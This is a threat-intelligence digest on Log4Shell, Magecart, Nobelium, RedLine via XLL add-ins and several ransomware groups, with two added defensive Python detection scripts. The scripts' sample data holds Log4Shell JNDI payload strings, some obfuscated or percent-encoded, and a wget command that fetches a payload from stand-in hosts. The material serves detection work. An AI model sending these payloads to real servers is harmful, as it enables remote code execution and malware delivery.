Cloudflare Stops Record DDoS Attack with 26 million rps
Cloudflare identified and mitigated a distributed denial-of-service attack amassing a record 26 million requests per second (rps).
Microsoft’s tracking of the BlackCat/ALPHV ransomware gang has identified an adaptable group of operators using a variety of tactics, techniques, and procedures (TTPs) in their campaigns.
Khonsari Ransomware & Log4Shell
The Khonsari ransomware family has been observed exploiting CVE-2021-44228 (Log4Shell) to target Windows servers. The malware executable “groenhuyzen.exe” is dropped by exploiting the JNDI class. At only 12 KB, the malware’s functionality is straightforward: it enumerates and encrypts (adding the extension .khonsari) all mounted drives with the exception of C:\. Only user directories are encrypted, including Documents, Videos, Pictures, Downloads, and Desktop.
CVE-2021-44228 / Log4Shell Vulnerability
Industry: N/A | Level: Tactical | Sources: LunaSec & GitHub-Log4Shell-List
A zero-day exploit has been identified for the Java logging library “log4j” that could result in remote code execution. Affected versions range from Log4j 2.0-beta9 through 2.14.1, with service impacts to many Apache Struts configurations and cloud services such as Steam, Apple iCloud, and others.
The exploit requires three components: a vulnerable log4j version, any protocol that allows the attacker to send the exploit string, and a log statement that logs the string from the request.
Mitigation is available through an update; affected users are recommended to update to log4j version “log4j-2.15.0-rc2”. Threat researchers have identified a variety of threats taking advantage of the widespread vulnerability, including Kinsing (cryptocurrency miner), Mirai malware, Cobalt Strike, a new unidentified ransomware strain, and likely others yet to be identified.
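The three components above (vulnerable version, a request that carries the lookup string, a log statement that records it) suggest two cheap defensive checks: flag log lines that contain a JNDI lookup, including the nested-lookup and percent-encoded forms used to hide the literal string, and flag deployed versions inside the affected range. The script below is an added example, not code from the digest or its sources; the log lines and the host `lookup.example` are constructed, and the version check encodes exactly the 2.0-beta9 through 2.14.1 range stated above.

```python
"""Added example (not from the digest): detect Log4Shell-style lookups in log
lines and check whether a log4j version falls in the affected range
2.0-beta9 .. 2.14.1 named above. Log lines and hostnames are constructed."""
import re
from urllib.parse import unquote

# Log4j lookups can be nested to hide the literal "jndi", e.g. ${${lower:j}ndi:...}
# or ${${::-j}ndi:...}. We reduce the innermost lookups until nothing changes.
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")              # ${x:-y} -> y
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.I)  # ${lower:j} -> j
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize_lookups(text: str, max_rounds: int = 16) -> str:
    """Undo percent-encoding and collapse nested lookups so 'jndi' becomes visible."""
    text = unquote(unquote(text))  # handles single or double percent-encoding
    for _ in range(max_rounds):
        reduced = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
        reduced = _CASE_LOOKUP.sub(lambda m: m.group(1), reduced)
        if reduced == text:
            break
        text = reduced
    return text


def has_jndi_lookup(line: str) -> bool:
    """True if the line, once normalized, carries a ${jndi:...} lookup."""
    return _JNDI.search(normalize_lookups(line)) is not None


def scan_log(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        if has_jndi_lookup(line):
            hits.append((n, normalize_lookups(line)))
    return hits


_VERSION = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?$", re.I)


def is_affected_version(version: str) -> bool:
    """True for 2.0-beta9 through 2.14.1, the range the advisory above gives."""
    m = _VERSION.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version: {version!r}")
    major, minor = int(m.group(1)), int(m.group(2))
    patch = int(m.group(3) or 0)
    tag, tag_num = (m.group(4) or "").lower(), int(m.group(5) or 0)
    if major != 2:
        return False
    # 2.0 pre-releases before beta9 are outside the stated range
    if (minor, patch) == (0, 0) and (tag == "alpha" or (tag == "beta" and tag_num < 9)):
        return False
    return (minor, patch) <= (14, 1)


# Constructed access-log lines (user-agent in the last quoted field), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://lookup.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://lookup.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://lookup.example/b}"',
    '10.0.0.9 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Flookup.example%2Fc%7D HTTP/1.1" 404 "-"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${env:HOME} ${date:yyyy}"',
]

if __name__ == "__main__":
    for n, normalized in scan_log(SAMPLE_LOG):
        print(f"line {n}: {normalized}")
    for v in ("2.0-beta8", "2.0-beta9", "2.14.1", "2.15.0-rc2"):
        print(v, "affected" if is_affected_version(v) else "not affected")
```

The normalizer only reduces the lookup forms shown (default-value and case-changing lookups plus percent-encoding); a detection rule in production should be paired with the version check and with egress monitoring for outbound LDAP/RMI connections from application servers, which is where the advisory’s third component (the log statement) actually fires.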
Magecart Abuses Google Tag Manager
Industry: eCommerce | Level: Strategic | Source: GeminiAdvisory
The Magecart threat actor group has abused the Google Tag Manager (GTM) service by adding malicious JavaScript within the GTM container. The GTM service was intended to give web authors the ability to update measurement codes and other code fragments. Abused GTM containers execute the embedded JavaScript when a browser loads the link to a container, collecting unsuspecting buyers’ information through additional payment forms and exfiltrating the data to a remote collection server. These findings are reported by Gemini Advisory, a Recorded Future company, which has been observing the threat since February 4th, 2021. Three hundred and sixteen ecommerce sites were compromised with infected containers, resulting in at least 88,000 payment card records posted for sale on dark web markets.
ANSSI Alerts of Nobelium Targeting French Organizations
The French national cyber-security agency, ANSSI, raised an alert detailing Nobelium phishing campaigns directed at French entities. Observation of the campaign began in February 2021, with a noticeable escalation in May. French email accounts are compromised and then used to send weaponized emails to foreign institutions in the diplomatic sector. The threat group uses various hosting providers, mainly OVH SAS, Hydra Communications Ltd, M247 Ltd and 12 additional observed hosting providers.
NSO Spyware Compromises US State Department Employees’ Phones
Apple Inc. has informed at least nine US Department of State employees that their iPhones had been compromised by NSO Pegasus spyware. Impacted officials were all either based in Uganda or focused on matters concerning the East African country, as shared by two Reuters sources. The compromises occurred within the last several months.
RTF Template Injection
Proofpoint has observed increased usage of RTF template injection by threat actors TA423, DoNot Team, and Gamaredon since as early as February 2021, with files publicly identified on April 5th. Template injection enables the threat actor to alter the RTF file’s control word structure to substitute a legitimate file destination with a URL that could download a malicious payload. Detection rates for this technique have so far been low. The APT groups have been targeting various organizations and countries with this technique: DoNot Team and TA423 are both associated with targeting Malaysia’s deepwater energy exploration, while Gamaredon targeted the Ukrainian government.
Microsoft Excel (XLL) Leads to RedLine Info-Stealer
Threat actors are using public discussion forums, or article comment systems, to spread malicious Excel documents that ultimately download and install the RedLine information stealer. Malicious links are hosted on Google Drive and download an XLL, which BleepingComputer describes as, “an add-in that allows developers to extend the functionality of Excel by reading and writing data, importing data from other sources, or creating custom functions to perform various tasks. XLL files are simply a DLL file that includes an ‘xlAutoOpen’ function executed by Microsoft Excel when the add-in is opened.” While test executions have been unsuccessful, potentially due to incompatible versions of Microsoft Excel, the sequence appears to involve the DLL being executed with regsvr32 or rundll32, which extracts the wget.exe program to download the RedLine binary and save it as %UserProfile%\JavaBridge32.
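The chain described above (an XLL add-in run through regsvr32 or rundll32, a dropped wget.exe, and a binary written to %UserProfile%\JavaBridge32) maps onto three process-creation detections. The script below is an added example, not code from the digest or from BleepingComputer: the event dictionaries are constructed and their field names (image, parent_image, command_line) are an assumption loosely modelled on Sysmon process-creation fields; the user name, download host `payload.example` and file paths other than JavaBridge32 are made up for illustration.

```python
"""Added example (not from the digest): three process-creation detections for the
XLL -> wget.exe -> %UserProfile%\\JavaBridge32 chain described above. Event shape
is an assumption (Sysmon-like dicts); events, user and hostnames are constructed."""
import re
from dataclasses import dataclass

LOADERS = {"regsvr32.exe", "rundll32.exe"}
XLL_ARG = re.compile(r"\.xll\b", re.I)
# The drop path %UserProfile%\JavaBridge32 is the one named in the digest.
JAVABRIDGE = re.compile(r"\\JavaBridge32(\.exe)?\b", re.I)
DOWNLOADER = re.compile(r"\bwget(\.exe)?\b", re.I)


@dataclass
class Finding:
    event_id: int
    rule: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Apply the three heuristics to one process-creation event."""
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "")
    findings = []
    # 1. regsvr32/rundll32 handed an .xll file (add-ins normally load inside Excel).
    if image in LOADERS and XLL_ARG.search(cmd):
        findings.append(Finding(event["id"], "xll_loaded_via_loader",
                                f"{image} loading an .xll add-in (parent {parent or '?'})"))
    # 2. wget writing to the JavaBridge32 path is the download step of the chain.
    if DOWNLOADER.search(image) or DOWNLOADER.search(cmd):
        if JAVABRIDGE.search(cmd):
            findings.append(Finding(event["id"], "redline_javabridge32_drop",
                                    "wget saving a payload as JavaBridge32"))
    # 3. Anything executing from the JavaBridge32 path is the dropped binary itself.
    elif JAVABRIDGE.search(cmd) or JAVABRIDGE.search(event.get("image", "")):
        findings.append(Finding(event["id"], "javabridge32_execution",
                                f"process started from JavaBridge32 path (parent {parent or '?'})"))
    return findings


def scan(events) -> list:
    return [f for e in events for f in evaluate(e)]


# Constructed events, not captured telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"EXCEL.EXE" C:\Users\alice\Downloads\invoice.xlsx'},
    {"id": 2, "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "command_line": r"rundll32.exe C:\Users\alice\Downloads\invoice.xll,xlAutoOpen"},
    {"id": 3, "image": r"C:\Users\alice\AppData\Local\Temp\wget.exe",
     "parent_image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"wget.exe http://payload.example/r -O C:\Users\alice\JavaBridge32"},
    {"id": 4, "image": r"C:\Users\alice\JavaBridge32",
     "parent_image": r"C:\Users\alice\AppData\Local\Temp\wget.exe",
     "command_line": r"C:\Users\alice\JavaBridge32"},
    {"id": 5, "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"regsvr32.exe /s C:\Windows\System32\legit.dll"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f.event_id}: {f.rule} - {f.detail}")
```

Rule 1 is the noisiest of the three in environments where XLL add-ins are legitimately deployed, so it is best treated as a correlation input; rules 2 and 3 key on the specific drop path from the digest and should be near-zero-noise, though they stop firing if the operators change the file name.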
Yanluowang Ransomware Linked to Thieflock Affiliate
Industry: Consultancy, Engineering, Financial & Manufacturing | Level: Tactical | Source: Symantec
The Yanluowang ransomware group, active since at least August 2021, has been targeting US corporations, specifically in the financial, manufacturing, IT, consultancy, and engineering sectors. The group has been using TTPs similar to those of Thieflock ransomware attacks. Based on observations by Symantec, there appears to be a link, or a shifting of allegiances, from Thieflock to the Yanluowang ransomware family. Notable TTP patterns observed include the use of BazarLoader for initial access, PowerShell to download tools that enable RDP in the registry, AdFind for reconnaissance, and various other credential-stealing tools.
BlackByte Ransomware from RedCanary
Red Canary presented research from a BlackByte ransomware incident response engagement with Kroll. The attack sequence covered initial access via ProxyShell and a web shell, post-exploitation with Cobalt Strike, impairing defenses through process monitoring, Windows Defender, and firewall modifications, and finally ransomware deployment and file exfiltration.
Cuba Ransomware
The FBI released a flash report on Cuba ransomware, which, based on tracking since November 2021, has compromised 49 entities across various critical infrastructure sectors, including but not limited to financial, government, healthcare, manufacturing, and information technology. Hancitor malware is identified as the initial infection vector that leads to Cuba ransomware. Threat actors use phishing emails, Microsoft Exchange vulnerabilities, compromised credentials, and RDP tools to gain initial access. The threat actors also employ many legitimate Windows services, such as PowerShell and PsExec, in addition to leveraging Windows admin privileges to execute their ransomware.